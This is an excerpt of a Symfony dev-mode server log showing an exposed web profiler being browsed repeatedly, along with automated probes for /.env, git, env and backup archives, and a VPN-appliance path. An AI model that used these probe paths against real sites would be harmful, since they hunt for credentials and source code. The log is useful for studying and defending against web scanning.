  2404. [2025-12-17 15:23:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=44.192.15.107&limit=10","method":"GET"} []
  2405. [2025-12-17 15:23:35] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  2406. [2025-12-17 15:23:35] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  2407. [2025-12-17 15:23:36] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  2408. [2025-12-17 15:23:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a96757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a96757","method":"GET"} []
  2409. [2025-12-17 15:23:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  2410. [2025-12-17 15:24:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"12dd43","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/12dd43?panel=cache","method":"GET"} []
  2411. [2025-12-17 15:24:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2412. [2025-12-17 15:26:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b9ec1c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b9ec1c","method":"GET"} []
  2413. [2025-12-17 15:26:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  2414. [2025-12-17 15:32:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a19422","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a19422?panel=twig","method":"GET"} []
  2415. [2025-12-17 15:32:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2416. [2025-12-17 15:33:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2417. [2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2418. [2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2419. [2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2420. [2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2421. [2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2422. [2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2423. [2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2424. [2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2425. [2025-12-17 15:34:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2bf974","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2bf974?panel=time","method":"GET"} []
  2426. [2025-12-17 15:34:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2427. [2025-12-17 15:36:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2428. [2025-12-17 15:36:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2429. [2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2430. [2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2431. [2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2432. [2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2433. [2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2434. [2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2435. [2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2436. [2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2437. [2025-12-17 15:40:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2438. [2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2439. [2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2440. [2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2441. [2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2442. [2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2443. [2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2444. [2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2445. [2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2446. [2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2447. [2025-12-17 15:45:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a19422","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a19422?panel=config","method":"GET"} []
  2448. [2025-12-17 15:45:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2449. [2025-12-17 15:57:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a19422","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a19422?panel=security","method":"GET"} []
  2450. [2025-12-17 15:57:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2451. [2025-12-17 15:58:46] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  2452. [2025-12-17 16:05:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4593c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b4593c?panel=exception","method":"GET"} []
  2453. [2025-12-17 16:05:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  2454. [2025-12-17 16:07:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23ffec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/23ffec?panel=twig","method":"GET"} []
  2455. [2025-12-17 16:07:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2456. [2025-12-17 16:09:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9b6635","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9b6635?panel=request","method":"GET"} []
  2457. [2025-12-17 16:09:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2458. [2025-12-17 16:17:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6f7da5","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/6f7da5?panel=time","method":"GET"} []
  2459. [2025-12-17 16:17:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2460. [2025-12-17 16:19:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23ffec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/23ffec?panel=time","method":"GET"} []
  2461. [2025-12-17 16:19:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2462. [2025-12-17 16:27:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2463. [2025-12-17 16:27:16] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  2464. [2025-12-17 16:29:12] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fswiftmailer-bundle&line=0","method":"GET"} []
  2465. [2025-12-17 16:30:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2466. [2025-12-17 16:30:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23ffec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/23ffec?panel=security","method":"GET"} []
  2467. [2025-12-17 16:30:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
